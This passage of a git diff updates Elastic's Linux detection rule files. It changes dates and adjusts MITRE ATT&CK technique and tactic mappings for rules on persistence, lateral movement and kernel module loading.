"sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/19" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -133,3 +133,16 @@ reference = "https://attack.mitre.org/techniques/T1021/" id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/linux/lateral_movement_unusual_remote_file_creation.toml b/rules/linux/lateral_movement_unusual_remote_file_creation.toml index 828592b0bde..12d810eed6d 100644 --- a/rules/linux/lateral_movement_unusual_remote_file_creation.toml +++ b/rules/linux/lateral_movement_unusual_remote_file_creation.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/20" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/02" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -140,6 +140,18 @@ id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" [rule.new_terms] field = "new_terms_fields" value = ["process.executable", "host.id"] diff --git a/rules/linux/persistence_apt_package_manager_execution.toml b/rules/linux/persistence_apt_package_manager_execution.toml index 121bf350707..4d1af08566d 100644 --- a/rules/linux/persistence_apt_package_manager_execution.toml +++ b/rules/linux/persistence_apt_package_manager_execution.toml @@ -2,7 +2,7 @@ creation_date = "2024/02/01" integration = ["endpoint", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -174,6 +174,11 @@ id = "T1059.004" name = "Unix Shell" reference = "https://attack.mitre.org/techniques/T1059/004/" +[[rule.threat.technique.subtechnique]] +id = "T1059.006" +name = "Python" +reference = "https://attack.mitre.org/techniques/T1059/006/" + [rule.threat.tactic] id = "TA0002" name = "Execution" diff --git a/rules/linux/persistence_apt_package_manager_file_creation.toml b/rules/linux/persistence_apt_package_manager_file_creation.toml index 6fa37d13b3e..b7166410e58 100644 --- a/rules/linux/persistence_apt_package_manager_file_creation.toml +++ b/rules/linux/persistence_apt_package_manager_file_creation.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/03" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -175,3 +175,21 @@ framework = "MITRE ATT&CK" id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" + +[[rule.threat.technique.subtechnique]] +id = "T1546.016" +name = "Installer Packages" +reference = "https://attack.mitre.org/techniques/T1546/016/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/linux/persistence_apt_package_manager_netcon.toml b/rules/linux/persistence_apt_package_manager_netcon.toml index 7e83bb830d6..b0287a10224 100644 --- a/rules/linux/persistence_apt_package_manager_netcon.toml +++ b/rules/linux/persistence_apt_package_manager_netcon.toml @@ -2,7 +2,7 @@ creation_date = "2024/02/01" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -156,3 +156,21 @@ framework = "MITRE ATT&CK" id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/linux/persistence_at_job_creation.toml b/rules/linux/persistence_at_job_creation.toml index c0e77855ab2..40a96e3b011 100644 --- a/rules/linux/persistence_at_job_creation.toml +++ b/rules/linux/persistence_at_job_creation.toml @@ -2,7 +2,7 @@ creation_date = "2024/05/31" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -133,39 +133,3 @@ reference = "https://attack.mitre.org/techniques/T1053/002/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1053" -name = "Scheduled Task/Job" -reference = "https://attack.mitre.org/techniques/T1053/" - -[[rule.threat.technique.subtechnique]] -id = "T1053.002" -name = "At" -reference = "https://attack.mitre.org/techniques/T1053/002/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1053" -name = "Scheduled Task/Job" -reference = "https://attack.mitre.org/techniques/T1053/" - -[[rule.threat.technique.subtechnique]] -id = "T1053.002" -name = "At" -reference = "https://attack.mitre.org/techniques/T1053/002/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/linux/persistence_boot_file_copy.toml b/rules/linux/persistence_boot_file_copy.toml index 291d6f8eaa7..7b91eeff00b 100644 --- a/rules/linux/persistence_boot_file_copy.toml +++ b/rules/linux/persistence_boot_file_copy.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/16" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -162,11 +162,3 @@ reference = "https://attack.mitre.org/techniques/T1059/004/" id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/persistence_bpf_program_or_map_load.toml b/rules/linux/persistence_bpf_program_or_map_load.toml index af4757fbc16..4255fc6e065 100644 --- a/rules/linux/persistence_bpf_program_or_map_load.toml +++ b/rules/linux/persistence_bpf_program_or_map_load.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/20" integration = ["endpoint", "auditd_manager", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/02/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -118,3 +118,21 @@ reference = "https://attack.mitre.org/techniques/T1014/" id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1547" +name = "Boot or Logon Autostart Execution" +reference = "https://attack.mitre.org/techniques/T1547/" + +[[rule.threat.technique.subtechnique]] +id = "T1547.006" +name = "Kernel Modules and Extensions" +reference = "https://attack.mitre.org/techniques/T1547/006/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/linux/persistence_chkconfig_service_add.toml b/rules/linux/persistence_chkconfig_service_add.toml index 554ad767f59..a93f65fa8e3 100644 --- a/rules/linux/persistence_chkconfig_service_add.toml +++ b/rules/linux/persistence_chkconfig_service_add.toml @@ -2,7 +2,7 @@ creation_date = "2022/07/22" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/24" [transform] [[transform.osquery]] @@ -196,6 +196,11 @@ id = "T1037" name = "Boot or Logon Initialization Scripts" reference = "https://attack.mitre.org/techniques/T1037/" +[[rule.threat.technique]] +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" diff --git a/rules/linux/persistence_credential_access_modify_ssh_binaries.toml b/rules/linux/persistence_credential_access_modify_ssh_binaries.toml index 523302ed1a5..7ecaaef7e15 100644 --- a/rules/linux/persistence_credential_access_modify_ssh_binaries.toml +++ b/rules/linux/persistence_credential_access_modify_ssh_binaries.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/21" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/24" [transform] [[transform.osquery]] @@ -187,6 +187,11 @@ id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" +[[rule.threat.technique]] +id = "T1554" +name = "Compromise Host Software Binary" +reference = "https://attack.mitre.org/techniques/T1554/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" diff --git a/rules/linux/persistence_cron_job_creation.toml b/rules/linux/persistence_cron_job_creation.toml index 752d0925262..0ba8618d0a2 100644 --- a/rules/linux/persistence_cron_job_creation.toml +++ b/rules/linux/persistence_cron_job_creation.toml @@ -2,7 +2,7 @@ creation_date = "2023/06/09" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/24" [transform] [[transform.osquery]] @@ -230,39 +230,3 @@ reference = "https://attack.mitre.org/techniques/T1053/003/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1053" -name = "Scheduled Task/Job" -reference = "https://attack.mitre.org/techniques/T1053/" - -[[rule.threat.technique.subtechnique]] -id = "T1053.003" -name = "Cron" -reference = "https://attack.mitre.org/techniques/T1053/003/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1053" -name = "Scheduled Task/Job" -reference = "https://attack.mitre.org/techniques/T1053/" - -[[rule.threat.technique.subtechnique]] -id = "T1053.003" -name = "Cron" -reference = "https://attack.mitre.org/techniques/T1053/003/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/linux/persistence_dbus_service_creation.toml b/rules/linux/persistence_dbus_service_creation.toml index 386571da585..379cc6b7a2a 100644 --- a/rules/linux/persistence_dbus_service_creation.toml +++ b/rules/linux/persistence_dbus_service_creation.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/16" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -138,6 +138,11 @@ id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" @@ -151,6 +156,11 @@ id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" diff --git a/rules/linux/persistence_dbus_unsual_daemon_parent_execution.toml b/rules/linux/persistence_dbus_unsual_daemon_parent_execution.toml index 6d9c71de08e..9d97b4d31db 100644 --- a/rules/linux/persistence_dbus_unsual_daemon_parent_execution.toml +++ b/rules/linux/persistence_dbus_unsual_daemon_parent_execution.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/21" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -158,6 +158,11 @@ id = "T1059.004" name = "Unix Shell" reference = "https://attack.mitre.org/techniques/T1059/004/" +[[rule.threat.technique]] +id = "T1559" +name = "Inter-Process Communication" +reference = "https://attack.mitre.org/techniques/T1559/" + [rule.threat.tactic] id = "TA0002" name = "Execution" diff --git a/rules/linux/persistence_dnf_package_manager_plugin_file_creation.toml b/rules/linux/persistence_dnf_package_manager_plugin_file_creation.toml index 10ca2105f97..ded6346ead2 100644 --- a/rules/linux/persistence_dnf_package_manager_plugin_file_creation.toml +++ b/rules/linux/persistence_dnf_package_manager_plugin_file_creation.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/25" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -157,7 +157,35 @@ reference = "https://attack.mitre.org/tactics/TA0003/" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" + +[[rule.threat.technique.subtechnique]] +id = "T1546.016" +name = "Installer Packages" +reference = "https://attack.mitre.org/techniques/T1546/016/" + +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/linux/persistence_dpkg_package_installation_from_unusual_parent.toml b/rules/linux/persistence_dpkg_package_installation_from_unusual_parent.toml index 595ab2d545a..c82730e95f3 100644 --- a/rules/linux/persistence_dpkg_package_installation_from_unusual_parent.toml +++ b/rules/linux/persistence_dpkg_package_installation_from_unusual_parent.toml @@ -2,7 +2,7 @@ creation_date = "2024/07/09" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -141,6 +141,23 @@ id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" + +[[rule.threat.technique.subtechnique]] +id = "T1546.016" +name = "Installer Packages" +reference = "https://attack.mitre.org/techniques/T1546/016/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" [rule.new_terms] field = "new_terms_fields" value = ["process.parent.executable"] diff --git a/rules/linux/persistence_dpkg_unusual_execution.toml b/rules/linux/persistence_dpkg_unusual_execution.toml index 73a6322b954..3ec87f425bb 100644 --- a/rules/linux/persistence_dpkg_unusual_execution.toml +++ b/rules/linux/persistence_dpkg_unusual_execution.toml @@ -2,7 +2,7 @@ creation_date = "2024/07/09" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -102,6 +102,11 @@ process.group_leader.name != null and not ( [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" + [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" @@ -112,11 +117,6 @@ id = "T1546.016" name = "Installer Packages" reference = "https://attack.mitre.org/techniques/T1546/016/" -[[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" - [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" @@ -141,6 +141,24 @@ name = "Compromise Software Supply Chain" reference = "https://attack.mitre.org/techniques/T1195/002/" [rule.threat.tactic] -name = "Initial Access" id = "TA0001" +name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" + +[[rule.threat.technique.subtechnique]] +id = "T1546.016" +name = "Installer Packages" +reference = "https://attack.mitre.org/techniques/T1546/016/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/linux/persistence_dracut_module_creation.toml b/rules/linux/persistence_dracut_module_creation.toml index 9427236d5fb..0df18519ede 100644 --- a/rules/linux/persistence_dracut_module_creation.toml +++ b/rules/linux/persistence_dracut_module_creation.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/16" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -164,6 +164,11 @@ reference = "https://attack.mitre.org/tactics/TA0002/" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1542" +name = "Pre-OS Boot" +reference = "https://attack.mitre.org/techniques/T1542/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" diff --git a/rules/linux/persistence_dynamic_linker_backup.toml b/rules/linux/persistence_dynamic_linker_backup.toml index 2dcef6e4fb8..428803c32e8 100644 --- a/rules/linux/persistence_dynamic_linker_backup.toml +++ b/rules/linux/persistence_dynamic_linker_backup.toml @@ -2,7 +2,7 @@ creation_date = "2022/07/12" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/17" +updated_date = "2026/03/24" [transform] [[transform.osquery]] @@ -192,3 +192,21 @@ reference = "https://attack.mitre.org/techniques/T1574/006/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + +[[rule.threat.technique.subtechnique]] +id = "T1574.006" +name = "Dynamic Linker Hijacking" +reference = "https://attack.mitre.org/techniques/T1574/006/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/persistence_git_hook_execution.toml b/rules/linux/persistence_git_hook_execution.toml index 55473220b03..78539f29fe0 100644 --- a/rules/linux/persistence_git_hook_execution.toml +++ b/rules/linux/persistence_git_hook_execution.toml @@ -2,7 +2,7 @@ creation_date = "2024/07/15" integration = ["endpoint", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -114,6 +114,11 @@ id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" + [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" diff --git a/rules/linux/persistence_git_hook_file_creation.toml b/rules/linux/persistence_git_hook_file_creation.toml index c5b9d78a19a..b7455b0cb8e 100644 --- a/rules/linux/persistence_git_hook_file_creation.toml +++ b/rules/linux/persistence_git_hook_file_creation.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/26" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -129,6 +129,11 @@ id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" + [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" diff --git a/rules/linux/persistence_git_hook_netcon.toml b/rules/linux/persistence_git_hook_netcon.toml index 3c79ca6de78..358537f729e 100644 --- a/rules/linux/persistence_git_hook_netcon.toml +++ b/rules/linux/persistence_git_hook_netcon.toml @@ -2,7 +2,7 @@ creation_date = "2024/07/15" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -123,6 +123,11 @@ id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" + [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" @@ -158,3 +163,16 @@ framework = "MITRE ATT&CK" id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/linux/persistence_git_hook_process_execution.toml b/rules/linux/persistence_git_hook_process_execution.toml index 2203dc37a30..3cb9ae2082d 100644 --- a/rules/linux/persistence_git_hook_process_execution.toml +++ b/rules/linux/persistence_git_hook_process_execution.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/26" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -132,6 +132,11 @@ id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" + [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" diff --git a/rules/linux/persistence_grub_configuration_creation.toml b/rules/linux/persistence_grub_configuration_creation.toml index d3c5b78af10..f874a2566c6 100644 --- a/rules/linux/persistence_grub_configuration_creation.toml +++ b/rules/linux/persistence_grub_configuration_creation.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/16" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -143,3 +143,16 @@ reference = "https://attack.mitre.org/techniques/T1574/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1542" +name = "Pre-OS Boot" +reference = "https://attack.mitre.org/techniques/T1542/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/persistence_grub_makeconfig.toml b/rules/linux/persistence_grub_makeconfig.toml index dc757627521..89ea6d20748 100644 --- a/rules/linux/persistence_grub_makeconfig.toml +++ b/rules/linux/persistence_grub_makeconfig.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/16" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -133,3 +133,16 @@ reference = "https://attack.mitre.org/techniques/T1574/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1542" +name = "Pre-OS Boot" +reference = "https://attack.mitre.org/techniques/T1542/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/persistence_init_d_file_creation.toml b/rules/linux/persistence_init_d_file_creation.toml index b4d7276cf08..22fd4882262 100644 --- a/rules/linux/persistence_init_d_file_creation.toml +++ b/rules/linux/persistence_init_d_file_creation.toml @@ -2,7 +2,7 @@ creation_date = "2023/03/21" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/24" [transform] [[transform.osquery]] @@ -192,7 +192,30 @@ id = "T1037" name = "Boot or Logon Initialization Scripts" reference = "https://attack.mitre.org/techniques/T1037/" +[[rule.threat.technique.subtechnique]] +id = "T1037.004" +name = "RC Scripts" +reference = "https://attack.mitre.org/techniques/T1037/004/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1037" +name = "Boot or Logon Initialization Scripts" +reference = "https://attack.mitre.org/techniques/T1037/" + +[[rule.threat.technique.subtechnique]] +id = "T1037.004" +name = "RC Scripts" +reference = "https://attack.mitre.org/techniques/T1037/004/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/linux/persistence_kde_autostart_modification.toml b/rules/linux/persistence_kde_autostart_modification.toml index 58550c3b588..b36a4b766fa 100644 --- a/rules/linux/persistence_kde_autostart_modification.toml +++ b/rules/linux/persistence_kde_autostart_modification.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/06" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/24" [transform] [[transform.osquery]] @@ -243,6 +243,11 @@ id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" +[[rule.threat.technique.subtechnique]] +id = "T1547.013" +name = "XDG Autostart Entries" +reference = "https://attack.mitre.org/techniques/T1547/013/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" diff --git a/rules/linux/persistence_kernel_driver_load.toml b/rules/linux/persistence_kernel_driver_load.toml index 0f7b646be9e..88fc5919f2c 100644 --- a/rules/linux/persistence_kernel_driver_load.toml +++ b/rules/linux/persistence_kernel_driver_load.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/26" integration = ["auditd_manager"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -96,31 +96,49 @@ Kernel modules extend the functionality of the Linux kernel, allowing dynamic lo [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" + [[rule.threat.technique.subtechnique]] id = "T1547.006" name = "Kernel Modules and Extensions" reference = "https://attack.mitre.org/techniques/T1547/006/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1014" name = "Rootkit" reference = "https://attack.mitre.org/techniques/T1014/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1547" +name = "Boot or Logon Autostart Execution" +reference = "https://attack.mitre.org/techniques/T1547/" + +[[rule.threat.technique.subtechnique]] +id = "T1547.006" +name = "Kernel Modules and Extensions" +reference = "https://attack.mitre.org/techniques/T1547/006/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/linux/persistence_kernel_driver_load_by_non_root.toml b/rules/linux/persistence_kernel_driver_load_by_non_root.toml index 9f4a8303937..53ddd96471a 100644 --- a/rules/linux/persistence_kernel_driver_load_by_non_root.toml +++ b/rules/linux/persistence_kernel_driver_load_by_non_root.toml @@ -2,7 +2,7 @@ creation_date = "2024/01/10" integration = ["auditd_manager"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -128,3 +128,21 @@ reference = "https://attack.mitre.org/techniques/T1014/" id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1547" +name = "Boot or Logon Autostart Execution" +reference = "https://attack.mitre.org/techniques/T1547/" + +[[rule.threat.technique.subtechnique]] +id = "T1547.006" +name = "Kernel Modules and Extensions" +reference = "https://attack.mitre.org/techniques/T1547/006/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/linux/persistence_kernel_module_load_from_unusual_location.toml b/rules/linux/persistence_kernel_module_load_from_unusual_location.toml index 6a383383172..ad22b980a2a 100644 --- a/rules/linux/persistence_kernel_module_load_from_unusual_location.toml +++ b/rules/linux/persistence_kernel_module_load_from_unusual_location.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/20" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/13" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -145,3 +145,21 @@ reference = "https://attack.mitre.org/techniques/T1014/" id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1547" +name = "Boot or Logon Autostart Execution" +reference = "https://attack.mitre.org/techniques/T1547/" + +[[rule.threat.technique.subtechnique]] +id = "T1547.006" +name = "Kernel Modules and Extensions" +reference = "https://attack.mitre.org/techniques/T1547/006/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = 